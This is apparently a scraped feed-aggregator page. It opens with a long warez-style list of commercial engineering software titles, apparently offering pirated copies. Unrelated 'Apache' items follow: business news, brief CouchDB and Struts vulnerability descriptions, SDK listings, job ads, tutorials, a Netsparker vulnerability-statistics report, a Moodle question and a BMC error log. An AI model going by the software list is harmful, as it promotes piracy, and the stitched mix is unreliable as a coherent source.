DeskArtes.Dimensions.Expert.v10.2.1.7.x32x64
DeskArtes.Sim.Expert.v10.2.1.7.x32x64
DriveWorks Pro 12.0 SP0
Kelton.Flocalc.Net v1.6.Win
Delcam.PowerINSPECT.2015.R2.SP1.Win32_64
DS DELMIA D5 V5-6R2014 GA
DAVID laserscanner 4.2.0.134 Pro
Elite.Software.Chvac.8.02.24.With.Drawing.Board.6.01
Elite.Software.Energy.Audit.7.02.113.Win
Elite.Software.Rhvac.9.01.157.With.Drawing.Board.6.01
PSS-ADEPT v5.0
ge interllution ifix v4.0
ESSCA OpenFlow v2012
Trimble RealWorks v6.5
ESRI CityEngine Advance 2015.1.2047 x64
Exelis ENVI v5.3,IDL v8.5,LiDAR v5.3 win64
EMIT.Maxwell.v5.9.1.20293
ESI PAM-FORM 2G v2013.0 Win
FEI.Amira.v6.0.1.Win32_64
FEI.Avizo.v9.0.1.Win32_64Linux.X64MACOSX
FIDES-DV.FIDES.CantileverWall.v2015.117 
FIDES-DV.FIDES.Flow.v2015.050
FIDES-DV.FIDES.GroundSlab.v2015.050 
FIDES-DV.FIDES.PILEPro.v2015.050 
FIDES-DV.FIDES.Settlement.2.5D.v2015.050
FIDES-DV.FIDES.Settlement.v2015.050 
FIDES-DV.FIDES.SlipCircle.v2015.050
FIDES-DV.FIDES.BearingCapacity.v2015.050
Global Mapper 16.2.5 Build 081915 x86x64
Graitec OMD v2015
rsnetworx for controlnet v11 cpr9 sr5
Harlequin Xitron Navigator v9 x32x64
HDL Works HDL Companion 2.8 R2 WinLnxx64
HDL Works IO Checker 3.1 R1 WinLnx64
HDL.Works.HDL.Design.Entry.EASE.v8.2.R6.for.Winlnx64
HEEDS.MDO.2015.04.2.Win32_64.&Linux64
Honeywell UniSim Design R430 English
thermoflow v24
Lakes Environmental AERMOD View v8.9.0
Lakes Environmental ARTM View v1.4.2
Lakes Environmental AUSTAL View v8.6.0
Mastercam.X9.v18.0.14020.0.Win64
McNeel.Rhinoceros.v5.0.2.5A865.MacOSX
McNeel.Rhinoceros.v5.SR12.5.12.50810.13095
Mintec.MineSight.3D.v7.0.3
MXGPs for ArcGIS v10.2 and v10.3
Moldex3D R13.0 SP1 x64
Mosek ApS Mosek v7.1 WinMacLnx
Midas.Civil.2006.v7.3.Win
NI Software Pack 08.2015 NI LabVIEW 2015
NI.LabVIEW.MathScript.RT.Module.v2015
NI.LabVIEW.Modulation.Toolkit.v2015
NI.LabVIEW.VI.Analyzer.Toolkit.v2015
NI.SignalExpress.v2015
NI.Sound.and.Vibration.Toolkit.v2015
NewTek.LightWave3D.v2015.2.Win32_64
NI LabWindows CVI 2015
HoneyWell Care v10.0
PACKAGE POWER Analysis Apache Sentinel v2015
Petrosys v17.5
Plexim Plecs Standalone 3.7.2 WinMacLnx
Power ProStructures V8i v08.11.11.616
Provisor TC200 PLC
Processing Modflow(PMWIN) v8.043
Proteus 8.3_SP1
QPS.Fledermaus.v7.4.4b.Win32_64
Siemens NX v10.0.2 (NX 10.0 MR2) Update Only Linux64
SIMULIA Isight v5.9.4 Win64 & Linux64
SIMULIA TOSCA Fluid v2.4.3 Linux64
SIMULIA TOSCA Structure v8.1.3 Win64&Linux64
Resolume Arena v4.2.1
Siemens Solid Edge ST8 MP01
TDM.Solutions.RhinoGOLD.v5.5.0.3
The.Foundry.NukeStudio.v9.0V7.Win64
Thinkbox Deadline v7.1.0.35 Win
ThirdWaveSystems AdvantEdge 6.2 Win64
Tecplot.360.EX.2015.R2.v15.2.1.62273.Win64
VERO SURFCAM 2015 R1
WAsP v10.2
Trimble.Inpho.SCOP++.5.6.x64         
Trimble.Inpho.TopDM.5.6.x64
Mentor.Graphics.FloEFD v15.0.3359.Suite.X64
Mentor Graphics FloTHERM Suite v11.1 Win32_64
Mentor.Graphics.FloTHERM.XT.2.3.Win64
Mentor_Graphics_HyperLynx v9.2 &Update1 Win32_64
Mentor.Graphics.FloVENT v11.1 Win32_64
Mentor.Graphics.FloMCAD Bridge 11.0 build 15.25.5
Mentor.Graphics.FloVIZ 11.1 Win32_64
Mentor.Graphics.FloTHERM PCB 8.0
Mentor.Graphics.Tanner.Tools.16.30.Win


          Apache, KAAC to form $3.5-billion pure-play Permian midstream C-corp      Cache   Translate Page   Web Page Cache   

Apache Corp. will contribute its midstream assets at Alpine High to Altus Midstream LP, a partnership jointly owned by Apache and Kayne Anderson Acquisition. At closing, KAAC will be renamed Altus Midstream Co., a C-corporation anchored by substantiall...

The post Apache, KAAC to form $3.5-billion pure-play Permian midstream C-corp appeared first on The Talley Group.


          Vuln: Apache CouchDB CVE-2018-11769 Remote Code Execution Vulnerability      Cache   Translate Page   Web Page Cache   
Apache CouchDB CVE-2018-11769 Remote Code Execution Vulnerability
          Dracoon Crypto Java SDK      Cache   Translate Page   Web Page Cache   
The Dracoon Crypto Java SDK adds secure data management functionality to business-oriented environments. This SDK is intended to help integrate client-side encryption. Java 6 or later is required.
Provider: Dracoon
Version: 1.0.1
Restricted access (requires provider approval): Yes
License: Apache License 2.0

          Dracoon Crypto Swift SDK      Cache   Translate Page   Web Page Cache   
The Dracoon Crypto Swift SDK adds secure data management functionality to business-oriented environments. This SDK is intended to help integrate client-side encryption. Xcode 7.3.1 or newer is required.
Provider: Dracoon
Restricted access (requires provider approval): Yes
License: Apache License 2.0

          Dracoon Crypto C# SDK      Cache   Translate Page   Web Page Cache   
The Dracoon Crypto C# SDK adds secure data management functionality to business-oriented environments. This SDK is intended to help integrate client-side encryption. The latest version is 1.0.1.
Provider: Dracoon
Version: 1.0.1
Restricted access (requires provider approval): Yes
License: Apache License 2.0

          Dracoon Java SDK      Cache   Translate Page   Web Page Cache   
The Dracoon Java SDK adds secure data management functionality to business-oriented environments. Java 6+ is required.
Provider: Dracoon
Version: 1.0.0
Restricted access (requires provider approval): Yes
License: Apache License 2.0

          DevOps Engineer - ROZEE.PK - Lahore      Cache   Translate Page   Web Page Cache   
MySQL database administration. Linux (Ubuntu, CentOS) and FreeBSD administration. Installation, administration and securing web servers e.g Apache, Nginx etc....
From Rozee - Mon, 06 Aug 2018 10:44:23 GMT - View all Lahore jobs
          Senior DevOps Engineer - ROZEE.PK - Lahore      Cache   Translate Page   Web Page Cache   
MySQL database administration. Linux (Ubuntu, CentOS) and FreeBSD administration. Installation, administration and securing web servers e.g Apache, Nginx etc....
From Rozee - Fri, 03 Aug 2018 16:46:49 GMT - View all Lahore jobs
          How to block all but LAN traffic on Apache      Cache   Translate Page   Web Page Cache   
If you need to limit traffic to Apache, Jack Wallen shows you how to use the Require directive to manage who can see your site.
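For Apache 2.4, such a restriction typically uses the Require directive inside a Directory (or Location) block. The document root and subnet below are placeholder values for illustration, not taken from the article:

```apache
<Directory "/var/www/html">
    # Permit only clients on the 192.168.1.0/24 LAN; all other
    # addresses receive 403 Forbidden.
    Require ip 192.168.1.0/24
</Directory>
```

After editing the configuration, reload Apache (e.g. `systemctl reload apache2` or `httpd`, depending on the distribution) for the change to take effect.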
          (USA-MI-Rochester) Developer Analyst      Cache   Translate Page   Web Page Cache   
## Minimum Qualifications Bachelor’s degree in Computer Science, Information Systems, Information Technology, closely related field, or an equivalent combination of education and/or experience. One year experience in enterprise applications problem-solving, application development using an object-oriented language, web languages, and scripting. Ability to work independently and routinely update director on results. Ability to contribute to group projects and work collaboratively as a member of a strong technical team. Strong problem-solving skills. Flexibility in work schedule; willingness to occasionally adjust work hours for the maintenance window is required: on Wednesdays between midnight and 8 A.M.; Tuesdays, Wednesdays, and Thursdays 3 times a year between semesters; fiscal year end June 30 and July 1; and a few limited weekends as determined. Ability to travel for education, professional development, or conferences. Excellent problem-solving, organizational, and analytical skills. Excellent oral and written communication skills. Work sample should include a written document of anything related to this line of work. ## Desired Qualifications Knowledge of the following programming languages and tools is desired: Java, PHP, HTML, JavaScript, CSS, SQL, PL/SQL. Familiarity with scripting, working with web application servers (Apache Tomcat), databases (PostgreSQL, Oracle) and support tools (Git, Maven, Gradle). ## All Qualifications Unless otherwise required by an applicable collective bargaining agreement, all minimum, additional and desired qualifications are preferred, but qualifications, degrees, and/or experience deemed comparable and/or equivalent by Oakland University in its sole and exclusive discretion may be considered. ## Position Purpose University Technology Services seeks an energetic and highly skilled developer for work on a variety of core enterprise application systems and solutions in support of the university mission. 
This position is involved with exciting technical projects using current software and development tools. Also, the individual contributes to team research and selection of emerging technologies used to enhance Banner (the university ERP) and provide interfaces with other third party systems. The incumbent is a member of a team that performs development, testing, troubleshooting, and user support of new processes, upgrades, and new application development. *Position Number:* 990020 *Requisition No.:* S00950 *Salary Range/Pay Rate:* Salary commensurate with education and experience. *Position Notes:* Compensation commensurate with education and experience. For more information on Oakland University’s salary structure and fringe benefits, please go to our website at http://www.oakland.edu/uhr/benefits *Employee Group/Grade:* AP Band R *Job Category:* Administrative-Professional *Work Schedule:* FT/Reg (40 hours) *Shift/Days:* This is a full time position. Two positions available. First consideration will be given to those who apply by August 22, 2018. *Pay Schedule:* Month *Number of Hrs./Wk.:* 40 *Job Open Date:* 08/09/2018 *Position Title:* Developer Analyst
          (USA-MO-St. Louis) Web Middleware Analyst      Cache   Translate Page   Web Page Cache   
**Your Role:** As a Senior Middleware Analyst you will provide support for Production public ECommerce platforms and support the back-end applications including troubleshooting & performance evaluation using testing & monitoring tools such as ALM, APMs such as DynaTrace, Nagios and other custom toolsets. You will have Middleware ownership, often coordinating several development teams, dependencies to diagnose problems across tiers and support teams. This role also includes managing deployments, upgrades, coordinating with infrastructure teams. Collaboration with offshore team members & teams in other timezones. Automation & monitoring via APM tools, shell scripting, unit testing and other scripting tools. You will also perform builds/deploys, assisting with version control and release testing. Moving release processes towards a model of continuous development & integration using tools such as Jenkins, JIRA, BitBucket, pipelines, CI and other DevOps fundamentals. Ability to quickly learn & understand sometimes open-source or community frameworks & functionality as they are released is key. **Who You Are:** **Basic Qualifications:** * Bachelor's degree in a related fieldand 4+ years of direct experience in middleware support role with hands-on configuration, monitoring & troubleshooting in a java-based application server environment **Preferred Qualifications: ** * Working knowledge of Java application server mgmt. (e.g. WebSphere, Wildfly) * Application containerization (e.g. Docker, Google/GKE, Kubernetes) * Networking firewall, load balancing concepts pertaining to enterprise application support (e.g. HA, DMZ) * Basic Unix administration tasks including shell scripting, other scripting ideal (e.g. Perl) * Database interaction, including NoSQL (e.g. Cassandra) * Messaging & ESB management (e.g. MQSeries, ActiveMQ, Apache Camel, IBM Message Broker ,Kafka) *Job Requisition ID:* 180071 *Location:* St. 
Louis *Career Level:* D - Professional (4-9 years) *Working time model:* full-time
          Valick wrote in the thread: Long-running script execution      Cache   Translate Page   Web Page Cache   
What do set_time_limit(0) and the connection timeout have to do with it? PHP does not care at all whether your connection has been lost; that is Apache's concern, and PHP keeps running for the time allotted to the script. I have already told you how to proceed: send a request to the server, say, once every 10 seconds and check whether the file is ready (with error handling too, of course), and once it is ready, serve it for download.
          Data Pipeline: Send Logs From Kafka to Cassandra      Cache   Translate Page   Web Page Cache   

In this post, I will outline how I created a big data pipeline for my web server logs using Apache Kafka, Python, and Apache Cassandra.

In past articles, I described how to install and configure Apache Kafka and Apache Cassandra. I assume that you already have a Kafka broker running with a topic named www_logs and a production-ready Cassandra cluster. If you don't, please follow those articles first in order to follow along with this tutorial.
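As a rough sketch of the producer side, each access-log line can be parsed into a structured record before being published to the www_logs topic. The combined-log regex and field names below are assumptions about the log format, and the kafka-python calls are left commented out so the parsing logic stands on its own:

```python
import json
import re

# Apache/Nginx "combined"-style access log line (assumed format).
LOG_PATTERN = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)

def parse_log_line(line):
    """Parse one access-log line into a dict, or return None if it
    does not match the expected format."""
    m = LOG_PATTERN.match(line)
    if m is None:
        return None
    record = m.groupdict()
    record["status"] = int(record["status"])
    record["size"] = 0 if record["size"] == "-" else int(record["size"])
    return record

# Publishing would then look roughly like this (needs kafka-python):
# from kafka import KafkaProducer
# producer = KafkaProducer(
#     bootstrap_servers="localhost:9092",
#     value_serializer=lambda v: json.dumps(v).encode("utf-8"))
# producer.send("www_logs", parse_log_line(line))

sample = '10.0.0.1 - - [09/Aug/2018:12:00:00 +0000] "GET /index.html HTTP/1.1" 200 512'
record = parse_log_line(sample)
```

On the consumer side, each JSON message can be inserted into Cassandra with a prepared statement, which is where the articles referenced above pick up.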


          State of Security for Open Source Web Applications 2018      Cache   Translate Page   Web Page Cache   

Each year, we publish a set of statistics summarizing the vulnerabilities we find in open source web applications. Our tests form part of Netsparker's quality assurance practices, during which we scan thousands of web applications and websites. This helps us to add to our security checks and continuously improve the scanner's accuracy.

This blog post includes statistics based on security research conducted throughout 2017. But first, we take a look at why we care about open source applications, and the damage that can be caused for enterprises when they go wrong.

Why Do Workplaces Use Open Source Software?

The reason for the rise in popularity of open source software in the business world is financial: your enterprise is getting great software for free. Some enterprises resonate with the open source philosophy of collaboration and giving back. This helps explain why big companies like Twitter, Tumblr, Netflix and Pinterest use and advocate for open source.

Netsparker has a natural interest in the security aspect of open source software, which raises an interesting question: since the source code of open source projects is publicly available, does that make these applications more or less secure than proprietary, closed-source software?

What Happens When Open Source Goes Wrong?

The global average cost of a data breach in 2017 was $3.62 million. In May to July of 2017, Equifax suffered a massive cyber-security breach, with attackers accessing hundreds of millions of customers' personal data. Although they announced this breach in September 2017, Equifax was informed in 2016 that their website was vulnerable, and was even told which vulnerabilities to check.

Hackers exploiting open source Apache Struts vulnerabilities were blamed for the Equifax breach. A deserialization vulnerability in the Struts REST plugin was initially suspected, but an OGNL Expression Injection vulnerability in Struts was ultimately found to be the cause of the breach.

Even though a vast amount of personal data was exposed in the Equifax breach, a significantly higher number of users were potentially affected by another security bug in readily available open source software. ROBOT (Return Of Bleichenbacher's Oracle Threat) is a type of attack that revives a 19-year-old vulnerability. Bleichenbacher's RSA vulnerability is still very prevalent on the Internet and affected top domains like Facebook and PayPal, along with many other vendors and open source projects. In December 2017, Netsparker released a hotfix version of our web application security scanner that included ROBOT security checks.

Why Does Netsparker Care About Open Source?

One of the best ways to demonstrate the effectiveness of the Netsparker web application security scanner is to test it against a wide variety of web applications used on the web. So our security researchers scan a great variety of open source web applications, including shopping carts and e-commerce solutions, social networking web applications, forums and blogs. The complexity of the testing environment increases when you consider the large number of languages and frameworks used to create web applications, such as PHP, Java, Ruby on Rails, ASP.NET, Node.js and Python.

The only reason – aside from an awesome team of dedicated security researchers – that we are able to scan so many web applications and detect so many vulnerabilities across such a wide range is that automation is at the heart of Netsparker's web application security scanning technology.

There are a couple of neat side benefits. Open source applications development teams get free security testing, empowering them to write more secure code. If you'd like to conduct your own, free, automated web application security testing, and read more about how we're huge supporters of the open source community, see our offer of Free Online Web Security Scans For Open Source Projects.

What Did Netsparker Discover About the State of Open Source Security In 2017?

What Is The Most Prolific Vulnerability in Open Source Applications?

The most predominant vulnerability discovered in open source web applications was Reflected XSS. This accounted for almost 70% of the overall number of reported vulnerabilities. All kinds of Cross-site Scripting (XSS) vulnerabilities ranked as number seven in the OWASP Top 10 List for 2017.

How Many Web Applications Did We Scan in 2017?

  • The total number of web applications we tested and scanned in 2017 was 154, an increase of over 48% from our last report
  • The most popular web application frameworks or languages in which scanned apps were developed are PHP (124), .NET (14) and Java (10)
  • The most popular back-end database servers used by these scanned applications were MySQL (86), Microsoft SQL Server (13)


What Were the Vulnerability Findings for 2017?

What is of most interest to us is the numbers of vulnerabilities we found in these web applications.

  • The number of vulnerable web applications was 59. This is over 38% of all the web applications we tested.
  • The total number of vulnerabilities Netsparker identified in these open source sites was 346.

Which Vulnerability Types Were Detected?

The web application vulnerabilities Netsparker discovered are listed in the table below.

Vulnerability Name | Total Occurrences | Severity Level
Reflected Cross-site Scripting (XSS) | 240 | High Severity
Frame Injection | 29 | Medium Severity
SQL Injection | 24 | Critical Severity
Stored Cross-site Scripting (XSS) | 15 | High Severity
Blind SQL Injection | 14 | Critical Severity
Code Evaluation | 6 | Critical Severity
Cross-Site Request Forgery (CSRF) | 5 | Low Severity
Open Redirection | 5 | Medium Severity
Boolean SQL Injection | 3 | Critical Severity
Blind Cross-site Scripting (XSS) | 2 | High Severity
Cross-site Scripting (XSS) via Remote File Inclusion (RFI) | 1 | High Severity
Server Side Template Injection (SSTI) | 1 | High Severity
Document Object Model Cross-site Scripting (DOM XSS) | 1 | High Severity

Around 88% of the total vulnerabilities were either of Critical or High Severity. For more information on how Netsparker defines severity levels, see Web Application Vulnerabilities Severities Explained.


How Has the State of Web Application Security Changed Since 2016?

Compared to our findings from last year's open source testing (see our previous Statistics About the Security State of 104 Open Source Web Applications), it's clear that XSS vulnerabilities remain, by far, the most common type of vulnerability found in open source web applications. The reason for this is that developers who are keen to provide rich interaction in modern web applications rely heavily on JavaScript on the client side.

Whereas last year SQL Injection vulnerabilities came in second place, this year Frame Injection vulnerabilities have replaced them. The top development languages, frameworks and database servers remain the same.


What Action Did the Open Source Applications Take?

If you consult our Web Application Advisories by Netsparker list, you can see that we published 32 advisories in 2017, with a further 28 still pending. We contacted the vendors of 28 of those 32 applications. Out of the 59 web applications in which we reported vulnerabilities, only six were fixed. Three of the advisories covered multiple vulnerabilities.

Would Your Open Source Project Benefit From Free Web Vulnerability Scans?

Based on our latest statistics, a randomly selected web application contains an average of 2.25 vulnerabilities. Developers could eliminate many of these by taking security best practices into account during the SDLC.
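That figure follows directly from the totals reported above: 346 vulnerabilities across 154 scanned applications.

```python
# Average vulnerabilities per scanned application, from the 2017 totals.
total_vulnerabilities = 346
applications_scanned = 154

average = round(total_vulnerabilities / applications_scanned, 2)
print(average)  # 2.25
```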

Does your team have time to conduct penetration testing to find them all? Do you know how to remove each vulnerability and verify that it is gone? Would you like access to an automated web application security scanning solution that detects them all and offers remediation recommendations?

Netsparker offers Free Online Web Application Security Scans for Open Source Projects. This is our token of appreciation to all the developers in the open source community and Netsparker's way of giving back to you. Open source projects such as OpenCart have already used our free, automated web application security scans with great success. Why not you, too?

Useful Resources

Web Application Vulnerabilities Index
Web Application Advisories by Netsparker
State of Open Source Web Applications


          Build me an android app
Sir, Request for Android app development: Our needs follow. A. The back-end application server is a web server with both Apache and sockets built in, using Python 3.6. B. A single screen for all purposes, masking non-relevant items and showing only task-based items at appropriate times or C... (Budget: ₹12500 - ₹37500 INR, Jobs: Android, Java, Mobile App Development, Python, Software Architecture)
          Apache Struts2 Freemarker Remote Code Execution (CVE-2017-12611) - Ver2
A remote code execution vulnerability exists in Apache Struts 2 when request data is evaluated as an expression in a Freemarker tag instead of being treated as a string literal. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.
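As an illustration of the vulnerable pattern (the template fragment below is hypothetical and follows the public S2-053 advisory for this CVE; `redirectUri` stands for any request-controlled value):

```ftl
<#-- Hypothetical Freemarker view: 'redirectUri' comes from the request.
     Because the tag attribute receives an expression rather than a string
     literal, the value is evaluated a second time on the server, so an
     injected expression in the request executes as code. -->
<@s.hidden name="redirectUri" value=redirectUri />
```

The published remediation was to upgrade to Struts 2.3.34 or 2.5.12, and to avoid passing untrusted input into Freemarker tag attributes as expressions.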
          Grid format JPGs rendered as PNGs
by Matthew Cook.  

I have some courses with a grid format. 

Their grids contain pictures to illustrate the topics. These pictures display successfully on all common browsers, except Internet Explorer (version 11 tested).

The %server%/pluginfile.php/123456/course/section/12345/gridimage/picture.jpg pictures are being sent to browsers in the PNG format. Most browsers work out they should ignore the filename but IE doesn't.

Other JPGs in the course work fine.

I'm using Moodle 3.4 on Apache.

Is there any particular way the server (especially PHP) might be set up that could cause this effect?
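One way to pin down where the mismatch happens is to ignore the filename and the Content-Type header entirely and look at the magic bytes at the start of the response body. A minimal sketch (the helper below is hypothetical, not part of Moodle; feed it the first bytes of the downloaded file):

```python
# Identify an image payload by its file signature, independent of the
# filename extension or the Content-Type header the server claims.

def sniff_image_format(data: bytes) -> str:
    """Return 'png', 'jpeg', or 'unknown' based on the leading magic bytes."""
    if data.startswith(b"\x89PNG\r\n\x1a\n"):  # PNG signature
        return "png"
    if data.startswith(b"\xff\xd8\xff"):       # JPEG SOI marker
        return "jpeg"
    return "unknown"
```

If this reports `png` for a `*.jpg` pluginfile URL, the server side really is emitting PNG data under a JPEG filename; most browsers re-sniff the bytes, while IE11 follows the declared type strictly. Comparing the `Content-Type` response header for the same URL (e.g. in the browser's developer tools) then shows whether the header or the bytes are wrong.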


          atsso.0.log showing BMCSSG2090W: Network error connecting with Atrium SSO server

This document contains official content from the BMC Software Knowledge Base. It is automatically updated when the knowledge article is modified.


PRODUCT:

TrueSight Presentation Server


COMPONENT:

TSPS SSO Integration


APPLIES TO:

TSPS 10.5



PROBLEM:

The following errors can be seen in the atsso.0.log file

WARNING 17-02-08 14:05:49.024 com.bmc.atrium.sso.sdk.impl.BaseREST.send().Thread-214:BMCSSG2090W: Network error connecting with Atrium SSO server (returncode: -2).
SEVERE 17-02-08 14:05:49.025 com.bmc.atrium.sso.sdk.impl.BaseREST.send().Thread-214:Network retry count depleted: 6
BMCSSG2090W: Network error connecting with Atrium SSO server (returncode: -2).
    at com.bmc.atrium.sso.sdk.impl.BaseREST.sendRequest(Unknown Source)
    at com.bmc.atrium.sso.sdk.impl.BaseREST.send(Unknown Source)
    at com.bmc.atrium.sso.sdk.impl.BaseREST.sendRequest(Unknown Source)
    at com.bmc.atrium.sso.sdk.impl.BaseREST.sendGet(Unknown Source)
    at com.bmc.atrium.sso.sdk.impl.InfoREST.fetchReply(Unknown Source)
    at com.bmc.atrium.sso.sdk.impl.InfoREST.fetchReply(Unknown Source)
    at com.bmc.atrium.sso.sdk.impl.InfoREST.getVersion(Unknown Source)
    at com.bmc.atrium.sso.sdk.impl.InfoREST.getServerVersion(Unknown Source)
    at com.bmc.atrium.sso.sdk.impl.SSOServerImpl.getServerVersion(Unknown Source)
    at com.bmc.truesight.api.auth.sso.SsoServerUtility.getAuthenticationObjectForSsoServer(SsoServerUtility.java:184)
    at com.bmc.truesight.api.auth.sso.SsoAclFacade.fetchSsoAuthenticationObject(SsoAclFacade.java:223)
    at com.bmc.truesight.api.auth.sso.SsoAclFacade.logOffUserFor(SsoAclFacade.java:525)
    at com.bmc.truesight.api.auth.sso.rest.SSOACLRestFacade.logOffUserFor(SSOACLRestFacade.java:263)
    at com.bmc.truesight.common.services.SSOServiceImpl.getSSOUserGroups(SSOServiceImpl.java:113)
    at com.bmc.truesight.usermgmt.rest.providers.servicefactory.UserAccountAuthenticationExecutionService.execute(UserAccountAuthenticationExecutionService.java:188)
    at com.bmc.truesight.usermgmt.rest.providers.UserAccountProvider.doLogin(UserAccountProvider.java:58)
    at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
    at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
    at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
    at java.lang.reflect.Method.invoke(Method.java:497)
    at com.bmc.truesight.rest.system.InvocationOrchestrator.invoke(InvocationOrchestrator.java:71)
    at com.sun.proxy.$Proxy108.doLogin(Unknown Source)
    at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
    at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
    at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
    at java.lang.reflect.Method.invoke(Method.java:497)
    at org.jboss.resteasy.core.MethodInjectorImpl.invoke(MethodInjectorImpl.java:137)
    at org.jboss.resteasy.core.ResourceMethodInvoker.invokeOnTarget(ResourceMethodInvoker.java:296)
    at org.jboss.resteasy.core.ResourceMethodInvoker.invoke(ResourceMethodInvoker.java:250)
    at org.jboss.resteasy.core.ResourceLocatorInvoker.invokeOnTargetObject(ResourceLocatorInvoker.java:140)
    at org.jboss.resteasy.core.ResourceLocatorInvoker.invoke(ResourceLocatorInvoker.java:103)
    at org.jboss.resteasy.core.SynchronousDispatcher.invoke(SynchronousDispatcher.java:356)
    at org.jboss.resteasy.core.SynchronousDispatcher.invoke(SynchronousDispatcher.java:179)
    at org.jboss.resteasy.plugins.server.servlet.ServletContainerDispatcher.service(ServletContainerDispatcher.java:220)
    at org.jboss.resteasy.plugins.server.servlet.HttpServletDispatcher.service(HttpServletDispatcher.java:56)
    at org.jboss.resteasy.plugins.server.servlet.HttpServletDispatcher.service(HttpServletDispatcher.java:51)
    at javax.servlet.http.HttpServlet.service(HttpServlet.java:729)
    at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:291)
    at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)
    at org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:52)
    at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:239)
    at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)
    at com.bmc.tsps.common.services.server.HighAvailabilityFilter.doFilter(HighAvailabilityFilter.java:29)
    at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:239)
    at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)
    at org.apache.shiro.web.servlet.ProxiedFilterChain.doFilter(ProxiedFilterChain.java:61)
    at org.apache.shiro.web.servlet.AdviceFilter.executeChain(AdviceFilter.java:108)
    at org.apache.shiro.web.servlet.AdviceFilter.doFilterInternal(AdviceFilter.java:137)
    at org.apache.shiro.web.servlet.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:125)
    at org.apache.shiro.web.servlet.ProxiedFilterChain.doFilter(ProxiedFilterChain.java:66)
    at org.apache.shiro.web.servlet.AbstractShiroFilter.executeChain(AbstractShiroFilter.java:449)
    at org.apache.shiro.web.servlet.AbstractShiroFilter$1.call(AbstractShiroFilter.java:365)
    at org.apache.shiro.subject.support.SubjectCallable.doCall(SubjectCallable.java:90)
    at org.apache.shiro.subject.support.SubjectCallable.call(SubjectCallable.java:83)
    at org.apache.shiro.subject.support.DelegatingSubject.execute(DelegatingSubject.java:383)
    at org.apache.shiro.web.servlet.AbstractShiroFilter.doFilterInternal(AbstractShiroFilter.java:362)
    at org.apache.shiro.web.servlet.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:125)
    at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:239)
    at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)
    at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:212)
    at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:106)
    at org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:614)
    at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:141)
    at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:79)
    at org.apache.catalina.valves.AbstractAccessLogValve.invoke(AbstractAccessLogValve.java:616)
    at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:88)
    at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:518)
    at org.apache.coyote.http11.AbstractHttp11Processor.process(AbstractHttp11Processor.java:1096)
    at org.apache.coyote.AbstractProtocol$AbstractConnectionHandler.process(AbstractProtocol.java:674)
    at org.apache.tomcat.util.net.JIoEndpoint$SocketProcessor.run(JIoEndpoint.java:277)
    at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142)
    at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:617)
    at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)
    at java.lang.Thread.run(Thread.java:745)
WARNING 17-02-08 14:05:49.026 com.bmc.atrium.sso.sdk.impl.SSOServerImpl.getServerVersion().Thread-214:Failed to get version from server, assuming release 1.0: AtriumSSOException [BMCSSG2091E: Failed to connect with Atrium SSO server. Please validate server is accessible from this host.]
FINEST 17-02-08 14:05:49.027 com.bmc.atrium.sso.sdk.impl.BaseREST.sendRequest().Thread-214:Build URL request.
FINEST 17-02-08 14:05:49.027 com.bmc.atrium.sso.sdk.impl.BaseREST.sendRequest().Thread-214:/atsso/info
FINEST 17-02-08 14:05:49.027 com.bmc.atrium.sso.sdk.impl.BaseREST.sendRequest().Thread-214:Sending URL request.
FINE 17-02-08 14:05:49.028 com.bmc.atrium.sso.sdk.impl.SSOServerImpl.getHandler().Thread-214:Creating HTTPS handler that accepts all clients: https://clm-aus-009612.bmc.com:8443/atriumsso
SEVERE 17-02-08 14:05:49.037 com.bmc.atrium.sso.common.CertificateUtils.captureServerCert().Thread-214:Failed to connect with AtriumSSO server: javax.net.ssl.SSLHandshakeException: Received fatal alert: handshake_failure
    at sun.security.ssl.Alerts.getSSLException(Alerts.java:192)
    at sun.security.ssl.Alerts.getSSLException(Alerts.java:154)
    at sun.security.ssl.SSLSocketImpl.recvAlert(SSLSocketImpl.java:2023)
    at sun.security.ssl.SSLSocketImpl.readRecord(SSLSocketImpl.java:1125)
    at sun.security.ssl.SSLSocketImpl.performInitialHandshake(SSLSocketImpl.java:1375)
    at sun.security.ssl.SSLSocketImpl.startHandshake(SSLSocketImpl.java:1403)
    at sun.security.ssl.SSLSocketImpl.startHandshake(SSLSocketImpl.java:1387)
    at sun.net.www.protocol.https.HttpsClient.afterConnect(HttpsClient.java:559)
    at sun.net.www.protocol.https.AbstractDelegateHttpsURLConnection.connect(AbstractDelegateHttpsURLConnection.java:185)
    at sun.net.www.protocol.http.HttpURLConnection.getInputStream0(HttpURLConnection.java:1513)
